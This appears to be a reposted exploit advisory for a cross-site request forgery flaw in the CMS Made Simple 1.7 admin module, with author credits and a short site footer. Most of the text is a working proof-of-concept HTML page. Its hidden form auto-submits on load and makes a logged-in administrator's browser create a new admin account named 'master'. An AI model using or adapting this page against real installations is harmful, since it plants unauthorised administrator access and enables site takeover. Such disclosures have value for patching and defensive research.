# Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software CMS Made Simple 1.7 # Category CMS / Portals # Site p4ge http://server/demo/2/10/CMS_Made_Simple # Plateform php # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team) # Proof of concept # Targeted URL: http://sever/demo/2/10/CMS_Made_Simple Script to Add admin user through Cross Site request forgery ................................................................................................................ <html> <body> <form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post"> <input type=hidden name="sp_" value="64becc90"> <input type=hidden name="user" value="master"> <input type=hidden name="password" value="master"> <input type=hidden name="passwordagain" value="master"> <input type=hidden name="firstname" value="12345"> <input type=hidden name="lastname" value="12345"> <input type=hidden name="email" value="aa@aa.com"> <input type=hidden name="active" value="on"> <input type=hidden name="groups" value="1"> <input type=hidden name="g1" value="1"> <input type=hidden name="adduser" value="true"> </form> <script> document.csrf.submit(); </script> </body> </html> .................................................................................................................. After execution just refresh the page and we can see that the admin user added automatically. #If you have any questions, comments, or concerns, feel free to contact me.
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论